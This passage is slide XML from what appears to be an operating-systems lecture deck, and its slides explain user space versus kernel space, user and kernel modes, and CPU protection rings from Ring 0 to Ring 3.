            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2030816" y="3645352"/>
            <a:ext cx="9774679" cy="479430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00A47E"/>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Shared</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Libraries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 name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2016471" y="2217870"/>
            <a:ext cx="2257877" cy="1327595"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00776D"/>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LIBRARIES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4530530" y="2206528"/>
            <a:ext cx="2257877" cy="1337434"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00776D"/>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SYSTEM DAEMONS</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7081556" y="2195425"/>
            <a:ext cx="2257877" cy="1327595"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00776D"/>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SHELLS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9547618" y="2210631"/>
            <a:ext cx="2257877" cy="1329227"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00776D"/>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TOOLS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="354399" y="2399503"/>
            <a:ext cx="1405890" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00A47E"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00776D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00776D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Space</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00776D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="182880" y="4283266"/>
            <a:ext cx="11807190" cy="2226022"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80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A27C"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="182880" y="5215041"/>
            <a:ext cx="11807190" cy="309590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00EAB2"/>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A27C"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2030816" y="5624516"/>
            <a:ext cx="9774679" cy="756871"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00A47E"/>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r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SCHEDULER, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DRIVERS, NETWORKING, SYSTEM CALLS, IPC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2016472" y="4653622"/>
            <a:ext cx="9789024" cy="970893"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00776D"/>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Kernel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="354399" y="4781839"/>
            <a:ext cx="1405890" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00A47E"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00776D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kernel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00776D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Space</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00776D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2030815" y="1737874"/>
            <a:ext cx="9774679" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00A47E"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00776D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User Applications (DB, Web, Net Tools, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00776D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00776D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00776D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4088946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i="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The executing code has no ability to directly access hardware or reference memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code running in user mode must delegate to system application program </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>interfaces (API) to access hardware or memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Most code running on your computer will execute in user mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Due to protection afforded by this isolation, crashes in user mode are </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>usually recoverable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>User Space</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21662300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i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kernel mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The executing code has complete and unrestricted access to the underlying hardware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It can execute any central processing unit (CPU) instruction and reference any memory address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Generally reserved for the lowest-level, most trusted functions of the OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Crashes in Kernel mode may be catastrophic</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Kernel Space</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3804127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User and Kernel Space</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2784760" y="1551708"/>
            <a:ext cx="5874327" cy="4890655"/>
            <a:chOff x="2854035" y="1551708"/>
            <a:chExt cx="5874327" cy="4890655"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Oval 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2854035" y="1551708"/>
              <a:ext cx="5874327" cy="4890655"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="bg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A27C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Oval 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3442853" y="2050472"/>
              <a:ext cx="4689763" cy="3906983"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="bg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A27C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Oval 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4031671" y="2563091"/>
              <a:ext cx="3505200" cy="2937164"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="bg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A27C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Oval 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4613562" y="3103418"/>
              <a:ext cx="2299855" cy="1828800"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFA27C"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="bg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A27C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5243938" y="3164158"/>
            <a:ext cx="1149928" cy="1107996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ring 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kernel</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257794" y="1607116"/>
            <a:ext cx="1149928" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ring 3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257789" y="2092032"/>
            <a:ext cx="1149928" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ring 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5243938" y="2590795"/>
            <a:ext cx="1149928" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ring 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4925273" y="5957465"/>
            <a:ext cx="1821884" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Applications</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9615798" y="2179617"/>
            <a:ext cx="663508" cy="623466"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="bg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A27C"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8737884" y="1748382"/>
            <a:ext cx="2448808" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Least Privileged</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9615798" y="2805540"/>
            <a:ext cx="663508" cy="623466"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="bg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A27C"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9620886" y="3429006"/>
            <a:ext cx="663508" cy="623466"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="bg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A27C"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9620011" y="4052754"/>
            <a:ext cx="663508" cy="623466"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFA27C"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="bg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A27C"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8723148" y="4701385"/>
            <a:ext cx="2448808" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
